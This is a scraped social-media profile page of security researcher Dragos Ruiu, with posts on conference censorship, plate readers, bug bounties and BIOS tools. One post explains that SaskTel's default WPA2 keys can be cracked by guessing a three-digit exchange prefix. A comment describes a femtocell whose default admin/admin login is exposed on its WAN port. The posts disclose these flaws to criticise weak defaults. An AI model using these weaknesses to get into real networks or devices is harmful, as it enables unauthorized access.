Profile

Cover photo
Dragos Ruiu
Works at dragostech.com inc.
Attended University of Alberta
Lived in Saskatchewan
957,241 views
AboutPostsPhotosYouTube+1's

Stream

Dragos Ruiu

Shared publicly  - 
 
Are your servers vulnerable?
2
Bogdan Neant's profile photoDaniel Stutz's profile photo
2 comments
Add a comment...

Dragos Ruiu

Shared publicly  - 
 
Sigh. The French Dept. of Interior (their DHS equivalent) and the U.S. DoD have decided that Eric Filiol's material about network attacks on infrastructure is too dangerous, so they have classified it, disallowing its presentation, and to punctuate their desires with an exclamation point, rattling sabers about prosecution and lawsuits of conference organizers and presenters. To which I'd like to remind everyone concerned: "Security by Obscurity, is not much Security at all." 

Hiding vulnerability information hinders solutions and mitigation more than it hinders attackers.

Oh well, fortunately we were turning back some pretty awesome talks in the runners-up this year, so now we will be able to use that slot for something else i regretted having to turn away....

Still. Sigh.

(P.s. I notice my overuse of the word "awesome" these days. Wish I could get that "Everything is Awesome" LEGO soundbite out of my head... freaking infectious soundmemes.)
20
9
Pascal Bertrand's profile photoGuillaume Bouffard's profile photodenis sorn's profile photomike xx's profile photo
 
They obviously do not want the solution. What could be the reason...? :-) 
Add a comment...

Dragos Ruiu

Shared publicly  - 
 
Turns out governments installing fixed plate readers isn't as big a security/privacy issue as much as unregulated private repo companies - more reasons to hate tow truck driving vampire leeches on society. http://goo.gl/4XOK0S
9
3
Ken Barber's profile photoStephen Baird's profile photoChristophe Drevet-Droguet's profile photoDragos Ruiu's profile photo
4 comments
 
+Stephen Baird you do realize we have that without the gargoyle suits..?
Add a comment...

Dragos Ruiu

Shared publicly  - 
 
Sometimes, weak passwords are worse than default passwords. Here in Saskatchewan, the dominant monopoly telco SaskTel, installs wifi routers with seemingly difficult to guess passwords, so most customers just leave them in the default configuration. A quick cruise of any residential street will find large numbers of default routers with their stock install SSID (and presumably their default passwords). The problem is the default password / SSID scheme contains very little entropy/randomness while appearing to most users as difficult to guess, the only part of the WPA2 key you have to guess is the exchange prefix (three numeric digits) of a telephone number. if the passwords were something immediately obvious as guessable, I'd wager more users would change it - but as it stands, getting an anonymous wifi connection in Saskatchewan is pretty simple.
18
3
Vašek Lorenc's profile photoAdam van Kuik's profile photoKevin Partridge's profile photoStephen Baird's profile photo
4 comments
 
That's almost as bad as not even telling your users your internet connected product has a user accessible web interface (which is, by default, open on the internet side as well as the internal interface).

As a great example, take the Sprint Airrave (a US cell phone company's femtocell). In order to function properly, it MUST be the first device behind your point of presence, so its WAN port must truly face the WAN. The instructions included with the unit, and apparently the story told by the techs who come to install it, is that it autoconfigures itself and if it needs to be worked on you must call the cellphone company.

...the default login is admin/admin, the techs who install them don't change that, and the configuration panel is open on the WAN port. When the unit at my parent's house was having issues, and I discovered just how insecure it was, I was not happy. 
Add a comment...

Dragos Ruiu

Shared publicly  - 
 
Damn, the folks in the security community are pretty awesome. Johnny Long, who is in Africa working on a much more worthy computer hack writes:

"I am humbled and speechless.@bannedit0 donated his IBB bounty to @ihackcharities: http://scarybeastsecurity.blogspot.in/2014/02/internet-bug-bounty-issues-its-first.html?m=1

Wow! 

I'm scratching my head, really because this is one of "those" days where I'm overwhelmed and feeling like I just want to get the flip out of here. Nothing seems to be going well or right and then this comes in and I'm nudged on by the fact that this isn't about how tired or strung out I am. It's not about how I feel. It's about something bigger that people like David D Rude II (bannedit) believe in enough to sacrifice for. 

And just like that, I'm back in the fight."
8
1
Gabriel Sfestarof's profile photo
Add a comment...

Dragos Ruiu

Shared publicly  - 
 
UPnP + fuzzer = ufuzz. Now get back to patching those SSL servers.
8
2
Matthew J. Harmon's profile photoBrett Coburn's profile photo
Add a comment...

Dragos Ruiu

Shared publicly  - 
 
At their presentation for CanSecWest 2014, Xeno Kovah and John Butterworth from MITRE announced the general availability of their new (improved) Copernicus 2 BIOS dumping utility that includes a lot of anti subversion/attack technologies (tl;dr they use the Intel trusted execution TXT storage to store dumped BIOS checksums for verification, and a number of other verification checks to hinder shenanigans)
http://goo.gl/Qwj1Wu

Your move, attackers...
15
7
Will Beers's profile photoMario Gastegger's profile photo
Add a comment...

Dragos Ruiu

Shared publicly  - 
4
Paul Atwal's profile photo
 
Mo' money, mo' problems.
Add a comment...

Dragos Ruiu

Shared publicly  - 
 
Also awesome, I've derided both ETH Zurich and U of Pittsburg drone flashyness for their reliance on external cameras and offboard processing, however this awesomework has been ported to a real flying device too. http://goo.gl/MqHCGc
7
2
Kim Halavakoski's profile photoAli-Reza Anghaie's profile photoDave Finnerty's profile photo
 
Nice
Add a comment...

Dragos Ruiu

Shared publicly  - 
2
2
Paul Atwal's profile photoPhillip Beynon's profile photoEugene Van Dam's profile photo
2 comments
 
Looks awesome - so now Samsung and LG will copy it.
Add a comment...
Story
Tagline
Stop, Think, Pwn.
Introduction
Systems Rationalizer
Bragging rights
Can hover inverted. ;-)
Education
  • University of Alberta
Basic Information
Gender
Male
Other names
dr
Work
Occupation
engineer
Employment
  • dragostech.com inc.
    engineer, 1997 - present
  • HP
  • Myrias
Places
Map of the places this user has livedMap of the places this user has livedMap of the places this user has lived
Previously
Saskatchewan
Links
Contributor to
Dragos Ruiu's +1's are the things they like, agree with, or want to recommend.
Threema
market.android.com

Threema ist eine Kurznachrichten-App mit einem besonderen Fokus auf Sicherheit. Echte Ende-zu-Ende-Verschlüsselung garantiert, dass niemand

CPU-Z
market.android.com

Android version of the popular CPU identification tool for PC/Windows., CPU-Z is a free application that reports information about your devi

Demand answers and real consequences for robocall election fraud
www.leadnow.ca

Elections Canada just traced misleading phone calls made during the 2011 federal election to a company that worked for the Conservative Part

KB14320-How to maximize battery life and free memory on the BlackBerry s...
btsc.webapps.blackberry.com

Maximizing Battery Power. Application Management. Multitasking - Close any running BlackBerry® smartphone applications that are not being ac

Play VOB,MKV,MTS,FLV RM,RMVB on Windows RT (Surface 8 RT included) » AMV...
blog.amvsoft.com

Overview Micrsoft has made an important step to support the playback of MPEG-4 on Windows 8 RT and Windows 8 Pro. Windows RT has excellent s

Locus Pro
market.android.com

MULTI-FUNCTION TOURIST NAVIGATION Irreplaceable application for hiking, geocaching and your everyday life. Locus offers many useful features

A free and open world depends on a free and open web. | Google
www.google.com

A free and open world depends on a free and open Internet. Governments alone, working behind closed doors, should not direct its future. The

There's a New Way to Own a Piece of Facebook Before Its IPO
mashable.com

If you're looking to invest in Facebook before its IPO but not privy to the secondary markets where shares of the company have been trad

Maverick
market.android.com

Off-road GPS navigator with offline maps support, compass and track recording. Use offline maps and GPS even without an internet connection.

Vancouver Riot: Psychology (Not Hooligans) Is Responsibile for the Chaos...
bleacherreport.com

As I sat at home watching the Vancouver riots unfold in front of me, I was amazed at how ill-informed the newscasters and on-site reporters